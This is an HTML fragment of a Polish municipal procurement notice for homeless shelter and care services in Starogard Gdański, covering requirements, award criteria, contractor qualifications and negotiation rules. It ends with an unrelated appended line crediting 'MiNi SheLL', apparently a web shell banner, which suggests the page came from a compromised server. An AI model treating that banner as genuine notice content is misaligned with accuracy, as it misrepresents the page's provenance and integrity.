pracę socjalną, w tym indywidualne programy wychodzenia z bezdomności,<br/>d)	zapewnić:<br/>•	trzy posiłki dziennie w tym jeden gorący dla osób dorosłych, dla dzieci dodatkowo czwarty posiłek: podwieczorek;<br/>•	podstawowe środki higieny osobistej, zmianę odzieży na czystą oraz możliwość wyprania brudnej odzieży i wysuszenia;<br/>•	dezynfekcję i dezynsekcję odzieży w przypadku braku możliwości jej wymiany;<br/>•	właściwe warunki socjalno-bytowe i nieskrępowany dostęp do pomieszczeń sanitarnych;<br/>•	kontakt z lekarzem pierwszego kontaktu i placówkami ochrony zdrowia, leki przeciwbólowe i przeciw przeziębieniu;<br/>•	poczucie bezpieczeństwa na terenie placówki, poszanowanie godności osobistej; <br/>•	informacje o dostępnych formach pomocy społecznej, a w razie potrzeby wsparcie w jej zorganizowaniu;<br/>•	pomoc prawną i psychologiczną;<br/>e)	współpracować z MOPS w realizacji indywidualnych programów wychodzenia z bezdomności.<br/>f)	nie później niż 3 dni od zdarzenia, pisemnie informować o:<br/>•	usunięciu osoby bezdomnej z placówki z podaniem uzasadnienia,<br/>•	opuszczeniu przez osobę bezdomną schroniska.<br/> 5.	Usługi schronienia dla bezdomnych z usługami opiekuńczymi:<br/>a)	umożliwienie spożycia posiłku w pokoju mieszkalnym, a w razie potrzeby – karmienie, <br/>b)	w miarę potrzeby pomoc w myciu, kąpaniu i ubieraniu, <br/>c)	Opieka higieniczna. Zapewnienie usług opiekuńczych w wydzielonym pomieszczeniu lub w pokoju mieszkalnym, jeżeli łóżko jest oddzielone zasłoną, <br/>d)	niezbędna pomoc w załatwieniu spraw osobistych, <br/>e)	zapewnienie pomocy w korzystaniu ze świadczeń zdrowotnych przysługujących na podstawie odrębnych przepisów.<br/>f)	współpracować z MOPS Starogard Gdański w realizacji kontraktów socjalnych i indywidualnych programów wychodzenia z bezdomności.<br/>g)	nie później niż 3 dni od zdarzenia pisemnie informować o:<br/>•	usunięciu osoby bezdomnej z placówki z podaniem uzasadnienia,<br/>•	opuszczeniu przez osobę bezdomną schroniska.<br/> 6.	Placówki świadczące wyżej wymienione wsparcie dla osób bezdomnych powinny spełniać standardy określone w Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018r. poz. 896), zwanym dalej Rozporządzeniem.<br/> 7.	Zamawiający zastrzega, że podana liczba osób, które zostaną skierowane do schroniska wraz z możliwością zwiększenia tej liczby ma charakter szacunkowy i jest efektem dokonanej przez Zamawiającego analizy na podstawie lat ubiegłych. Faktyczna liczba osób, które zostaną skierowane do schroniska dla osób bezdomnych może się różnić od liczb wskazanych w ust. 2. Zamawiający zastrzega sobie prawo niewyczerpania całego zakresu przedmiotu zamówienia jak i jego zwiększenia w zależności od potrzeb Zamawiającego oraz możliwości Wykonawcy.<br/> 8.	Zamawiający dopuszcza możliwość dodania do wzoru umowy jako załącznik regulaminu obowiązującego w schronisku pod warunkiem, że jego zapisy nie stoją w sprzeczności z postanowieniami umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-07-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość schroniska od siedziby Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>a)	nie podlegają wykluczeniu;<br/>b)	spełniają warunki udziału w postępowaniu, o ile zostały one określone.<br/> 2.	Na podstawie art. 112 Ustawy, Zamawiający określa warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej. Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, jeżeli Wykonawca wykaże, że:<br/>a)	w zakresie części od I do V:<br/>wykonał (zakończył) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie 2 usługi polegające na zapewnieniu schronienia dla osób bezdomnych.<br/>W przypadku oferty wspólnej wykonawców warunek musi spełniać samodzielnie minimum jeden z wykonawców. Powyższy warunek nie podlega sumowaniu w przypadku złożenia oferty na dwie lub więcej części tzn. nawet w przypadku złożenia oferty na wszystkie części wystarczy wykazać, że wykonawca zrealizował dwie usługi w powyższym zakresie.<br/><br/>b)	w zakresie części od VI do VIII:<br/>wykonał (zakończył) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie 2 usługi polegające na zapewnieniu schronienia wraz usługami opiekuńczymi dla osób bezdomnych.<br/>W przypadku oferty wspólnej wykonawców warunek musi spełniać samodzielnie minimum jeden z wykonawców. Powyższy warunek nie podlega sumowaniu w przypadku złożenia oferty na dwie lub więcej części tzn. nawet w przypadku złożenia oferty na wszystkie części wystarczy wykazać, że wykonawca zrealizował dwie usługi w powyższym zakresie.<br/> 3.	Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art. 108 ust. 1 Ustawy oraz w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego . <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują: wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/> 2.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje przedmiot zamówienia, do którego realizacji te uprawnienia są wymagane.<br/> 3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają przedmiot zamówienia, do realizacji których te zdolności są wymagane.<br/> 4.	W przypadku, o którym mowa w ust. 2 i 3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, który przedmiot zamówienia wykonają poszczególni wykonawcy.<br/> 5.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/> 6.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 Ustawy, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.platformazakupowa.pl/starogard_gdanski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-19 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-16</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <p class="mb-0">Część 8 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 2.	Postępowanie prowadzone jest w trybie podstawowym z możliwością przeprowadzenia negocjacji treści ofert w celu ich ulepszenia, o którym mowa w art. 275 pkt 2 Ustawy.<br/> 3.	Do negocjacji zostaną zaproszeni wykonawcy, których oferty nie podlegają odrzuceniu.<br/> 4.	Zamawiający ograniczy liczbę wykonawców, których zaprosi do negocjacji ofert do 3 z zastrzeżeniem ust. 5. W przypadku mniejszej liczby ofert Zamawiający zaprosi do negocjacji wszystkich wykonawców.<br/> 5.	W celu ograniczenia liczby wykonawców zamawiający przyjmie kryterium najniższej ceny. Zaproszenie zostanie skierowane do wykonawców, którzy w rankingu opracowanym na podstawie powyższego kryterium zajmą miejsca od 1 do 3. Jeśli na pozycji 3 zostanie sklasyfikowanych dwóch lub więcej wykonawców, zamawiający również tych wykonawców zaprosi do negocjacji.<br/> 6.	W przypadku skorzystania przez Zamawiającego z możliwości negocjowania treści ofert, negocjacje dotyczyć będą wyłącznie tych elementów treści ofert, które podlegają ocenie w ramach kryteriów oceny ofert. Negocjacje mogą dotyczyć wszystkich kryteriów oceny ofert. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawca może złożyć ofertę na wszystkie części Zamówienia. Zgodnie z art. 91 ust. 3 Ustawy Zamawiający ogranicza liczbę części, która może zostać udzielona jednemu Wykonawcy:<br/>1)	w zakresie części I, II, III i IV:<br/>W przypadku gdy Wykonawca złoży więcej niż jedną ofertę w zakresie części od I do IV jego oferta może zostać wybrana jako najkorzystniejsza tylko w jednej z powyższych części. Jeśli Wykonawca złoży ofertę najkorzystniejszą w dwóch lub większej liczbie części, zostanie mu udzielona część w ramach, której Zamawiający zamierza skierować większą liczbę osób bezdomnych;<br/>2)	w zakresie części VI i VII: <br/>W przypadku gdy Wykonawca złoży więcej niż jedną ofertę w zakresie części od VI do VII jego oferta może zostać wybrana jako najkorzystniejsza tylko w jednej z powyższych części. Jeśli Wykonawca złoży ofertę najkorzystniejszą w dwóch lub większej liczbie części zostanie mu udzielona część w ramach, której Zamawiający zamierza skierować większą liczbę osób bezdomnych.<br/>2.	Jednemu Wykonawcy Zamawiający maksymalnie udzieli zamówienie na cztery części przyjmując założenie, że Wykonawcy zostanie udzielone tylko jedno zamówienie w zakresie od części I do IV oraz jedno zamówienie w zakresie części od VI do VII.

Creat By MiNi SheLL
Email: jattceo@gmail.com